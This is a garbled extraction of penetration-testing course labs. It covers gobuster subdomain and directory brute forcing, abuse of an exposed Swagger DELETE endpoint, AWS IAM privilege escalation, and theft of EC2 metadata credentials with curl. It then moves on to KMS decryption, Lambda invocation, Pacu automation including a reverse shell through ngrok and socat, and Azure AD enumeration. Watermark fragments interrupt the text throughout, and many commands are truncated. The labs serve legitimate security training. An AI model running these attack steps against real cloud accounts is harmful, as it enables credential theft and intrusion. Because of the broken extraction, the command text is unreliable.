What we see when we cat this out is a list, but a list of what? This happens to be a list of all of the 'common'
Gregg Harris
au
subdomains that have been found by order of likelyhood inside of speci c respositories like hackernews and
<p
These subdomains are the basis of the entire host of potentially. What gobuster can do is start with a base
Ha
domain like:
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
sec588.net
: G
To
www.sec588.net
ce
Li
blog.sec588.net
live
Go through the wordlist looking for 'valid' 200 OK messages. Gobuster is a rather 'dumb' tool however, it will just
look for valid 200 OK messages, it can follow redirects, but it will also detect '404's as valid at times.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
This particular wordlist has a di erent feel. All of the words on here look like the end's of URI's. The reason for
23169600
Ruby on Rails set of applications in which the rails routes
tlo
this is because this particular wordlist comes from github entries. They are actually based on repositories for the
ou
routes.rb
@
le is looked at. The particular interest in
this le are uri's that have been removed from routes.rb, which could be done for many valid reasons. The hope
66
was to:
s1
ne
2. Get a list of URI's that may have security issues that a developer may have needed to remove from public
Gregg Harris
au
exposure.
<p
s
Now that we have a baseline for a set of word lists let's play with them to discover good a known pages.
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Gobuster has a set of tools to discover three individual items.
: G
To
Let's look at some of the options for gobuster by going into the gobuster subdirectory and running the
executable:
$ cd /opt/gobuster
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Let's explore a few of these, rst we will be working with the gobuster dns options to nd new hosts for us to
s1
attack:
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
We will be using a few command line switches to start:
-d : this will specify our domainname. For this lab it will be: <class-subdomain>.sec588.net
3e1e3b497543e6c11ac8e4188959c93e
/home/sec588/files/wordlists/subdomains-10k.txt
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600
We have found a few hosts that could be interesting:
@
ou
tlo
66
www
s1
ne
ljo
blog
Gregg Harris
au
<p
dev
s
rri
Ha
wiki
gg
railsapi
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Let's Explore some of these in more detail. Do any of them have interesting directories?
:
To
d
se
Gobuster has a directory brute forcing capability that is rather primitive but e ective. Let's start with appending
Li
a rails route to the end of some of hosts. We will start with blog as it is the rst entry in our list:
$ cd /opt/gobuster
live
$ ./gobuster help dir
-u : This will be our url string, so for the blog.<class-subdomain>.sec588.net this will be our
3e1e3b497543e6c11ac8e4188959c93e
url for our lab.
-a : This is the user-agent string that is sent, our Slingshot build for SEC588 has a very speci c UserAgent
string in the environment variables. To see it type:
20
20
-t : This is the to up the number of threads, we will use 100
,
28
pauljones166@outlook_com
-q : There will many errors, this surpress those errors.
ly
Ju
>
env | grep UA and you will see that the $UA variable is set to Chrome 74
om
_c
Our command:
ok
23169600 ou
$ /opt/gobuster/gobuster dir -u blog.<class-subdomain>.sec588.net -w
/home/sec588/files/wordlists/rails-routes-5k.txt -a $UA -q -t 100
@
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Let's take a look at our blog site, if we open Firefox, navigate to:
gg
blog.<class-subdomain>.sec588.net .
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
n se
ce
Li
live
This particular site appears to be able to Create a New Post .
3e1e3b497543e6c11ac8e4188959c93e
20
20
As a user you can create a post. You should go ahead and enter one in. Here is *AS AN EXAMPLE The author is
,
using the following one:
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
Once this is created we can see more functionality, such as the blog post can have comments.
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
Notice however that every URL post has a #, in our EXAMPLE we are using:
ok
/posts/7 23169600 ou
@
tlo
66
Record your posts number because we will need this later, and we will use it for our lab in the next section.
s1
ne
ljo
Once you have created a comment you may notice that comments can be deleted:
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
live
Please Note that this API is a Development API and the functionality of the API is not yet fully enabled. Using the
'Execute' function of this API will not yield you any results.
Look above at the output of gobuster, you probably saw many di erent url's potentially, but one in particular
may have stood out.
Let's take a look at /api closely, when you open it you may notice that is a Swagger API:
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
The Swagger UI has two options that seem to be able to be used one is the method, another method is
_c
GET
the method. This one may be one that we may want to explore.
ok
DELETE
This will DELETE your post, but it could also delete any posts on the system so be kind to your neighbors.
ljo
Gregg Harris
au
Your author as an example will DELETE the {id} of 7 , you will may or may not have a di erent
<p
number.
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
Do not use the Execute Command to execute the request, it will not work Use the curl below!
3e1e3b497543e6c11ac8e4188959c93e
Conclusion
In this lab we covered how to use a large wordlist to comb through an environment and uncovered not just
20
potentially hidden and not necessarily known servers but also hidden endpoints and potentially hidden
20
functionality. We looked at how the functionality of one system coud be changed by just uncovering an api
section.
,
28
pauljones166@outlook_com
ly
In the wild we may nd that the full functionality and security of a system is bypassed by using hidden API's,
Ju
hidden administrative consoles, or just by attempting to access sections of an applicaion that are not meant to
>
om
be accessed.
_c
Why This Lab Is Important
ok
23169600 ou
tlo
All too often we see websites that have multiple avenues for testing but are missed. As penetration testers we
@
should be looking for all of the avenue's that we may nd on a system, whether they are full documented or not.
66
It just so happens that /api was a fully documented API but not every single one will be. Don't be afraid to try
s1
Gregg Harris
Bonus (If Time Permits or Homework)
au
<p
s
There is a hidden ruby console that is available on the system. See if you can trigger the console by nding a
rri
broken page or creating some kind of error on the system. If you nd the console, see if you can execute ruby
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Additional Resources
: G
To
live
20
, 20
28
pauljones166@outlook_com
Brief Intro
ly
Ju
>
AWS IAM can be very complex with many options to con gure permissions and various di erently places. While
om
that complexity can be managed through advisory type software, most often permissions are set very loosely.
_c
This lab will walk you through leveraging keys and elevating priviledges to be able to eventually obtain access to
ok
data.
23169600 ou
tlo
There are a few IAM mechanisms that we will explore including, looking at versioning and looking at using ec2.
@
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
Requirements for This Lab
3e1e3b497543e6c11ac8e4188959c93e
It will also require that we have our AWS tools in our vm installed, you can check this by typing the following
commands in the cli and looking for the aws help message:
$ aws
20
20
Try It Yourself
,
28
pauljones166@outlook_com
ly
1. Review your policy set
Ju
2. Find an EC2 Instance Pro le that you can leverage
>
3. Run an EC2 instance that contains your user private key to login
om
_c
Walkthrough
ok
Getting started
23169600 @
ou
tlo
66
We will begin our lab, where left our previous labs, in Lab 2.1 we leveraged an AWS CLI token and now we wish to
s1
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
The rst item that we will wish to review is the ability for us to see the secret data:
ljo
Gregg Harris
au
<p
$ cat /home/sec588/files/workdir/secretdata.txt
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
This le appears to
:
To
be base64 encoded, we can tell by the format the encoding uses only the following characters: a-z,A-Z,0-9,+,/.
d
We also can tell by the fact that there is padding of = used. Let's run this through the base64 decoder in our
se
live
$ base64 -d /home/sec588/files/workdir/secretdata.txt
The le will print garbage instead of text. This is indicative that there is something special about this le. Maybe
this le is encrypted? Amazon does provide a Key Management Service to help protect data. Let's attempt to use
it:
We can see that we are unable to leverage the system by getting an error:
3e1e3b497543e6c11ac8e4188959c93e
(AccessDeniedException)
20
20
,
28
pauljones166@outlook_com
ly
Ju
>
om
Finding a way to escalate privileges
_c
ok
What privileges do we have? IAM can be complicated, the user can have policies directly attached to them and
23169600
they can also have policies that not attached but speci ed. @
ou
tlo
Listing out Bob's policies:
66
s1
ne
Note if you are not sure of bob's username you can always look it up:
ljo
Gregg Harris
This command will allow us to get Bob's actual username:
au
<p
| get-user: will get the user name for the current session you are in.
gg
re
It would appear Bob has no direct policies. Let's see if he has any policy attachments:
n
ce
Li
live
$ aws iam list-attached-user-policies --profile lab22 --user-name bob-<class-subdomain>
REMEMBER: A user can have direct policies, but they can also have attached policies and either one can provide
additional rights and permissions.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
Bob has one attached policy. Copy the ARN from the previous command. Let's now look at his policy:
om
_c
Attempt to run this command:
ok
v1
23169600 @
ou
tlo
$ aws iam get-policy-version --profile lab22 --policy-arn <from previous command> --version-id
66
If the command shows you that it does not work for example:
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Try additional versions v2 , v3 ... In our labs we had up to v6 .
: G
To
A user can have up to 5 policies, no more. Look at all the policies, do any othem re ect KMS?
d
nse
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
We can however look at other services that we have access to. We have a few options available to us, we have
EC2 , and we have the PassRole
23169600 tlo
option avaiable to use as well.
@
ou
Reviewing EC2 Instances
66
s1
EC2 systems can have their own policy permissions. This is done so that EC2 instances can then talk to other
ne
AWS Services. Given a limited set of privileges we have, let's explore what Role Assignments may be in use by
ljo
Gregg Harris
au
<p
"\(.InstanceId) || \(.IamInstanceProfile.Arn)"'
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
We now see that we have several instances with several IamInstancePro les attached. Did you heppen to notice
an instance with the name KMS in it?
arn:aws:iam::<numbers>:instance-profile/ec2-kms-<class-subdomain>
3e1e3b497543e6c11ac8e4188959c93e
$ aws ec2 describe-instances --instance-id <id from> --profile lab22 --output table
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Let's grab the following items:
23169600 @
ou
tlo
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Record these two items that we will need to use to create our OWN ec2 instance We will use this in an exercise
G
coming up.
:
To
d
se
We have an ec2 Instance that potentially is running with a permission set that could provide use with the right
n
permissions between to do sometype of action with KMS. While the name KMS appears in the name, there is no
ce
other real way with the permissions we have to determine what this role can do. What we can do is attach this
Li
"Resource": "arn:aws:ec2:*::image/ami-00a208c7cdba991ea"
Your instructor will provide you a number, replace X with that number.
3e1e3b497543e6c11ac8e4188959c93e
For vLive, Simulcast, and OnDemand Students we recommend that you create a Key based on the following
variables 1XXXX where XXX is the last octect of your computer's IP address on the internet. You can use
www.ipchicken.com (http://www.ipchicken.com) to nd out your IP address For individuals with IP addresses below
20
100 you can use 0's for example for an address that end in 88 you can use 1088 as your student number.
, 20
28
pauljones166@outlook_com
$ aws ec2 create-key-pair --profile lab22 --key-name studentX-<class-subdomain> --query
ly
'KeyMaterial' --output text > /home/sec588/files/workdir/studentX-<class-subdomain>.pem Now
Ju
with that key we can use the values recorded above to launch an ec2 instance:
>
om
$ aws ec2 run-instances --profile lab22 --image-id ami-00a208c7cdba991ea --iam-instance-
_c
profile Arn=<Arn from the ec2-kms-class-subdomain> --key-name studentX-<class-subdomain> --
ok
23169600
subnet-id <subnetId> --security-group-ids <GroupId> --output table
@
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
This process may take up to 5 minutes. RECORD THE INSTANCE ID
: G
To
Note the instance Id in the output, once the system is launched you will be able to SSH to it via its public IP
d
se
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
Scroll through and look for a public IP Address.
23169600 ou
tlo
$ chmod 4600 /home/sec588/files/workdir/student1-<class-subdomain>.pem
@
66
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G:
To
d
nse
ce
Li
live
Please note the following pieces of data to used later:
20
20
This lab has shown us that while we may not think that a permission is harmless, a skilled attacker could take a
,
seemingly restrictive permission and abuse it to accomodate what they are after. We will also see how this
28
pauljones166@outlook_com
permission set can be abused further.
ly
Ju
Additional Resources
>
om
_c
SANS SEC540: Secure DevOps and Cloud Automation (https://www.sans.org/sec540)
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
20
, 20
28
pauljones166@outlook_com
Brief Intro
ly
Ju
>
Throughout this course you will be interacting with many of Amazon Web Services API's. We discovered an AWS
om
Key string potentially in our Day 1 Lab 4 exersize. Let's see if we can actually attempt to use those particular
_c
keys to our advantage. Perhaps these keys have elevated privileges, or perhaps they can help us get further into
ok
the environment.
23169600 ou
tlo
A diagram of what we are going to attempt in this lab is found below.
@
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
Requirements for This Lab
3e1e3b497543e6c11ac8e4188959c93e
Try It Yourself
20
20
1. Copy the AWS EC2 Service Token by leveraging the AWS IAM Metadata Key
,
28
pauljones166@outlook_com
2. The Metadata token will allow you to list out KMS keys
3. Decrypt the secretdata.txt le by leveraging KMS to perform the operation on your behalf
ly
Ju
4. List out AWS Lambda Functions
5. Execute the function called 'lambda-<class_subdomain>'
>
om
6. Find the secrets in each case.
_c
ok
Walkthrough
Getting started
23169600 @
ou
tlo
66
This lab should pick us up where we left o . We should be able to have SSH access to our environment:
s1
ne
ljo
Gregg Harris
au
<p
From this machine we have full root permissions, this can be found by running a few root commands:
s
rri
Ha
$ sudo ls /root
gg
There will be no password set for sudo on this device. This device can also laterally move around the
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
environment as it is in a VPC that is adjacent to other nodes, open a new MATE window and let's look for an ip
G
(.InstanceId) \(.PrivateIpAddress)"'
ce
Li
live
None of the instances may allow 'ping' however if you attempt ssh to one of them you will get a login prompt or
SSH Key accept prompt. These instances while potentially not available to the public, are internal, and may allow
for lateral movements.
$ ssh 10.10.10.X
3e1e3b497543e6c11ac8e4188959c93e
Let's however try and obtain the keys to elevate our privileges, from the EC2 instance we are in:
$curl http://169.254.169.254/latest/meta-data/iam/security-credentials
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
The output will not look very well formed it may show up like this:
s1
ne
ljo
ec2-kms-role-<class-subdomain>ubuntu@<ip>
Gregg Harris
au
<p
We need to copy the rolename up to the word ubuntu and then add this to the next query:
s
rri
$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-kms-role-<class-
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
The output will re ect as follows:
: G
To
d
n se
ce
Li
live
3e1e3b497543e6c11ac8e4188959c93e
"Code" : "Success",
"LastUpdated : "<Time>",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIXXXXXXXXXXXX",
"SecretAccessKey" : "XXXXXXXXXXXXXXXXXXXX",
20
"Token" : "XXXXXXXXXXXXXXXXXXXX/////////XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
20
"Expiration" : <Time>
}
,
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Now that we have a Valid Token with Access Key ID we can go ahead and move those into the appropriate
ne
locations, open a new terminal window. By performing these commands we are now going to be the logging into
ljo
Gregg Harris
EC2 as this new user. From that window open your favorite text editor and edit
au
/home/sec588/.aws/credentials
<p
s
rri
nano /home/sec588/.aws/credentials
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
[lab25]
n se
ce
aws_access_key_id = <AccessKeyIdHere>
Li
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
Then open the le with your favorite editor and add the following sections at the
28
/home/sec588/.aws/config
pauljones166@outlook_com
end:
ly
Ju
[profile lab25]
>
om
_c
region = us-east-1
ok
23169600 tlo
With our new token, let's see if we can now 'solve our previous challenge'. Can we list KMS Keys?
@
ou
aws kms list-keys --profile lab25
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
:
To
d
n se
To see if the decrypt is possible we can ask the KMS to use its own knowledge of available keys to perform
ce
decrypt operations:
Li
live
aws kms decrypt --profile lab25 --ciphertext-blob fileb://<(cat
/home/sec588/files/workdir/secretdata.txt | base64 -d) --output text --query Plaintext | base64
-d > unsecretdata.txt
You should now be able to run cat unsecretdata.txt and it would reveal our 'secret data!'
3e1e3b497543e6c11ac8e4188959c93e
Additional Privileges with Lambda!
This particular pro le role lambda privileges. We can uncover this by just attempting to try the following:
20
20
aws lambda list-functions --profile lab25
,
28
pauljones166@outlook_com
You could see a Lambda Function called:
ly
Ju
>
lambda-<class-subdomain>
om
_c
Lambda Let's execute this function and see if it will work with an empty payload:
ok
23169600 ou
tlo
aws lambda invoke --function-name lambda-<class-subdomain> --profile lab25 ./lambda-out.txt
@
66
cat ./lambda-out.txt
ljo
Gregg Harris
au
<p
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
The following permissions allowed us to perform these actions:
:G
To
d
nse
"lambda:ListFunctions",
ce
()
"lambda:InvokeFunction", ()
Li
"lambda:InvokeAsync" ()
live
For the KMS we just need decrypt and list permissions:
3e1e3b497543e6c11ac8e4188959c93e
"kms:Decrypt", ()
"kms:ListKeyPolicies",
"kms:ListRetirableGrants",
()
()
"kms:ListGrants", ()
"kms:ListKeys", ()
20
"kms:Encrypt", ()
20
"kms:ListAliases", ()
"kms:CreateKey"
,
()
28
pauljones166@outlook_com
ly
Ju
>
om
Without that many rights we can perform alot of damage, so we should be cautious and careful with these keys
and permissions.
_c
ok
Why This Lab Is Important
23169600 @
ou
tlo
In the last 2 labs we have gone from a non-priviledged, or less than privileged AWS user to a user that has the
66
capability to perform additional functions. By performing these operations we should be able to gain more
s1
access to the AWS environments and we can show the criticality of why these keys need to be protected.
ne
ljo
We always recommend learning how to harden your environments, and as such we recommend our Secure
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
To
d
nse
ce
Li
live
20
Brief Intro
, 20
28
pauljones166@outlook_com
Pacu is a tool that will allow us to automate the enumeration, exploitation and discovery of services in Amazon
ly
Web Services (AWS). Much of the previous labs can be automated using the PACU tool. While the tool is not
Ju
without it's small limitations, however the tool does provide automation in many of the manual work ows we
>
have done. Leveraging the PACU tool we can weaponize keys that we have found.
om
_c
Requirements for This Lab
ok
This lab requies the student to have:
23169600 @
ou
tlo
66
s1
Finished Labs 2.4 and 2.5, have a set of API keys that are current in time, and can validate that the commands
ne
Gregg Harris
au
Try It Yourself
<p
s
rri
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
2. Import all of your keys
G
6. List out the data for each of these commands, speci cally lambda
n
ce
Walkthrough live
Let's open the MATE terminal so that we can launch Postman
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
Gregg Harris
au
<p
cd /opt/pacu
s
rri
To ensure that we do not have data that is corrupt we will type the following commands:
Ha
gg
rm sqlite.db
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
rm -Rf sessions
:
To
d
se
mkdir sessions
n
ce
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
Pacu allows you to get access to existing credentials to do this we can run a few commands:
ljo
Gregg Harris
au
<p
>import_keys --all
s
rri
This command will import the two keys you have in your existing aws credentials le. Let's swap to Lab22
Ha
gg
>swap_keys
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Let's see how we can run some commands. First let's set our region, but what region will we use? We are
currenting in unless your instructor has told you otherwise. The command will show
n
us-east-1 regions
ce
>regions live
To set this to region to us-east-1 , this will tune our scans to just the single region instead of all regions and
make our labs faster
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
To list out all the modules type the following commands
:G
To
>ls
d
nse
We can see a fairly large number of modules. Let's look at the module.
ce
iam__enum_permissions
Li
>help iam__enum_permissions
live
We now see a few options that allow us to target speci c users or roles. For now, let's just run the module as is.
>run iam__enum_permissions
>run iam__enum_users_roles_policies_groups
3e1e3b497543e6c11ac8e4188959c93e
This module leverages the IAM Enum permissions to give us all the data, however it is not able to display it all on
the screen.
20
>data
, 20
28
pauljones166@outlook_com
One more item, let's replicate one of our earlier labs, can we replicate a version change automatically?
ly
Ju
> run iam__privesc_scan
>
om
We can actually do this, this tool will help us run the aws command to replace our access using the right
_c
privileges
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
ec2-kms-instance-profile-<class-subdomain>
d
se
Do you recall seeing this from Lab 2.5? It is because we actually have this instance pro le mapped to us.
n
ce
Li
Now Let's choose 4 , let's attempt to use the SSH Create an EC2 function to get the credentials. This will
live
create the EC2 Instance, it will give you the IP address of the request, it will also print out the private key. All of
this has to be put together in one piece to be able to get the same result as Lab 2.5.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Lambda listings
s1
ne
Gregg Harris
au
<p
>run lambda__enum
s
rri
This will fail, we do not have rights. We did however have a user that had the appropriate rights, let's see how we
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
:G
swap_keys
To
d
se
run lambda__enum
live
We now have enumerated Lambdas, to see this let's type data but this time we will specify the service.
data Lambda
If you have time there are speci c commands that allow you to run a proxy client, the proxy can provide a
20
reverse shell back to your system. To use the proxy client you will need a few things:
20
,
28
1. A registered nGrok account, it can be a free account, make you have completed this from yesterday's lab.
pauljones166@outlook_com
2. Open terminal 1, start ngrok by using the following command:
ly
Ju
>
om
_c
ngrok tcp 9998 ()
ok
23169600 @
ou
tlo
3. Open terminal 2, start a socat listener on a DIFFERENT SHELL:
66
s1
ne
ljo
Gregg Harris
au
5. Open terminal 3, you may have to get the ngrok TCP/IP address for socat.
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
nslookup X.tcp.ngrok.io
G
NOTE: X will be a number, and it can change! Because you may have DNS Resolution issues you may
d
live
3e1e3b497543e6c11ac8e4188959c93e
sudo apt update ()
20
20
7. Save the script le as script.txt, this is all done from the: /home/sec588/files/workdir .
,
28
pauljones166@outlook_com
ly
8. Make sure PACU is running, run the following command: Remember that Lab22 is the user with rights you
Ju
may need to swap_keys .
>
om
_c
run ec2__startup_shell_script --instance-ids <instance id from lab 2.4 and 2.5>@us-east-1 -
ok
-script /home/sec588/files/workdir/script.txt
23169600 ou
tlo
9. The shell will take up to 5 minutes to be found because the system needs to be shutdown / boot.
@
66
Conclusion
s1
ne
Throughout this lab, we walked through what it would take to automate an attack on AWS with proper toolling.
ljo
Gregg Harris
The tooling for much of these items do not necessarily exist yet as many of these technologies are nacent. The
au
more that we see these technologies be attacked, the greater our toolsets will be.
<p
s
rri
PACU provides us with the capability to automate the testing of an AWS account's set of permissions. Quite often
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
the complexity of the AWS System may leave the administrators with a sense of security with the proliferation of
G
live
20
20
We will be playing around with Azure AD and the di erent RBAC roles that exist. To understand a bit of the Azure AD
,
28
pauljones166@outlook_com
Permissions and the di erent RBAC roles. We will be using the Azure CLI tools that we have installed as well as the Azure
ly
Portal to look at the permissions on the system.
Ju
>
There are several ways we can manage azure resources:
om
_c
Manage the resources through the Web URL
ok
Manage the resources the az cli, cross platform doesn't require powershell
For the majority of our tools we will be using the az cli tool, we will however, also be using the web interface as, and we will
66
also show you how to get a windows command execution in an up coming exersize.
s1
ne
Gregg Harris
au
<p
Try It Yourself
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
1. Use the az login tool to login via a webbrowser and through the cli.
n
2. Use tool to list out users and to list out the roles that the users have to resources.
ce
3. List out the virtual machines in the system, their associated disks, their associates snapshots, and their associates
Li
backups
live
4. Login via the browser and list out the Azure AD Domain Services Resources.
Walkthrough
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
Gregg Harris
au
$ az login -h
<p
s
Here we can see that there are a few options. One option is to use the following option:
rri
Ha
$ az login
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
This would allow us to login using the web browser, it will open Firefox, choose Login as a New user, or if prompted login
G
live
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
Once you login, you will not be returned back to the terminal you need to manually click on it to see the successful login:
>
om
_c
ok
23169600 @
ou
tlo
66
s1
ne
ljo
Gregg Harris
au
<p
This is just one way to login, but it requires the browsing interface to be availabe. What if you needed a di erent option to
s
rri
login, such as one in which you did not have a webbrowser or GUI fallback option.
Ha
gg
$ az logout
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Here is a di erent login option, where you can pass usernames and passwords over the command prompt:
:
To
live
3e1e3b497543e6c11ac8e4188959c93e
20
,20
28
pauljones166@outlook_com
ly
Ju
Now that we are in, we can attempt to understand what permission we may have for this user.
>
om
First let's take a tour over the di erente Azure Active Directory commands, with Azure Active Dirctory we can see our users
_c
and see some of their pro le information:
ok
$ az ad --help
23169600
If you look there are several 'subcommands' for az ad, such as
@
user
ou
tlo
as well as app and sp . We will use some of
66
$ az ad user --help
ljo
Gregg Harris
au
<p
s
rri
Ha
gg
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
n se
ce
Li
live
Now let's take a look at the lists of users on the system, the rst command will show you a json array, it may be di cult for
you to manipulate, instead let's use table format as we can in the second command:
$ az ad user list
3e1e3b497543e6c11ac8e4188959c93e
{DisplayName:displayName,UserPrincipalName:userPrincipalName,UserType:userType}' -o table
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
23169600 @
ou
tlo
66
s1
The command above allowed us to manipulate the output by ltering down what is displayed as well as what is displayed by
ne
naming the columns di erent names. The query syntax is from : JMESPath query (http://jmespath.org/tutorial.html
)
ljo
(http://jmespath.org/tutorial.html)
Gregg Harris
au
<p
Now we can see all the users that are on the system. Which ones are guest and which ones are active members. But what
s
permissions do they have in Azure? For this we need a few more queries. We will be look at the Azure roles rst:
rri
Ha
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
Now this list is also in a JSON Array, so let's use the table format to try and get a better idea for the output:
: G
To
live
It appears that Summer has a global reader role in Azure. Let's try and see what other resources we may have rights to.
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Let's manipulate the query to show us:
Ju
>
1. The name of the Virtual Machine
om
2. The resource group of the Machine
3. The provisioning state of the Virtua Machine
_c
4. The Virtual Machine hardware size
ok
$az vm list --query '[]. 23169600 ou
tlo
{Name:name,ResourceGroup:resourceGroup,ProvisioningState:provisioningState,VMSize:hardwareProfile.vmSize}'
@
-o table --resource-group <class-subdomain>-resources
66
s1
ne
ljo
Gregg Harris
au
<p
s
rri
Ha
It would appear that this environment has a few machines. Some of them are Standard_DS2_V2 , and there may be other
sizes well. You may see names such as dc1 and iis that are clues, but could also not necessarily be a Domain
gg
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
G
Now compute instances can have disks that you can attach them that form the hard disk of the machine. We can list out
:
To
live
You can see which one of these disks exists, in our case it's one disk per machine, but it could be more, there could even be
orphaned disks . Keep this in mind when look over these disks.
3e1e3b497543e6c11ac8e4188959c93e
$ az snapshot list --resource-group <class-subdomain>-resources
20
, 20
28
pauljones166@outlook_com
ly
Ju
>
om
_c
ok
What we see here is a disk that is called 'dc1-disk`. This is potentially a snapshot for the domain controller disk. Given
23169600
enough risk we may be able to get a copy of this disk and pull out domain controller artifacts.
ou
tlo
Now how do we see backups? Backups are stored in a vault, to see the backups you need two pieces, rst you need the
@
'vault name' and you need the resource group. To get the resource groups we are working with you could use the following
66
command again:
s1
ne
Gregg Harris
au
To get the name of the vaults we can list out all vaults:
<p
s
rri
Here we can list out all the vaults and get the name of the vaults we to look at. Armed with this informaion we can construct
gg
our query
re
ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK
: G
To
d
se
n
ce
Li
live
$ az backup item list --resource-group <class-subdomain>-RESOURCES --vault-name <Vault name from vault
list command>
3e1e3b497543e6c11ac8e4188959c93e
20
, 20
28
pauljones166@outlook_com
ly
Ju
